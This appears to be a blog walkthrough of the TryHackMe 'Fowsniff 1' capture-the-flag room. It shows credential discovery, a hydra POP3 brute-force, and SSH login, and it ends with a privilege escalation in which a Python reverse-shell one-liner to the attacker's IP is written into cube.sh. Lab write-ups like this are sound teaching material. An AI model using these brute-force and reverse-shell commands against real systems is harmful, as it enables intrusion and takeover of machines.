Step 1 : Connect to TryHackMe and start target machine.
- Download OpenVPN configuration setting from TryHackMe platform
- Connect to TryHackMe by running the command in kali terminal:
sudo openvpn /pathtoOVPNfile.ovpn
3. Start machine in ‘fowsniff 1’ room — target ip address will be displayed in a minute.
https://tryhackme.com/room/ctf
Step 2 : Information gathering using Nmap
- Start nmap scan of the target ip:
nmap -A -O <target ip>
Step 3: Detailed Findings
Open ports:
22 : SSH
80 : http Apache httpd 2.4.18
110 : pop3 Doveco pop3d
143 : imap Dovecot imapd
- Navigating to robots.txt > No details found
2. On viewing port80 page found> twitter account details.
3. Visiting twitter account found on the page > found paste bin link with credentials
4. Following the paste bin link found credentials with hash values
5. Created 2 files, users.txt and pass.txt with cracked hash values.
6. Since pop3 service is available lets try brute force with this found username and password list, found pop3 username and password
hydra pop3://10.10.169.67 -L users.txt -P pass.txt
7. Connect pop3 service using nc and port 110.
nc 10.10.169.67 110
8. Reading the messages: found temporary SSH message.
retr 1
retr 2
Found hint for user for SSH login
9. Trying to login through SSH.
ssh baksteen@10.10.169.67
10. Searching for file with user execution permission
find / -group users -type f 2>/dev/null
11. Update cube.sh with python reverse shell code and execute it and start listener on kali
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.8.131.223”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
running ./cube.sh
Got the flag!
With these steps, I was able to answer all questions posted in fowsniff 1 room on TryHackMe.
Thank you for reading this blog..
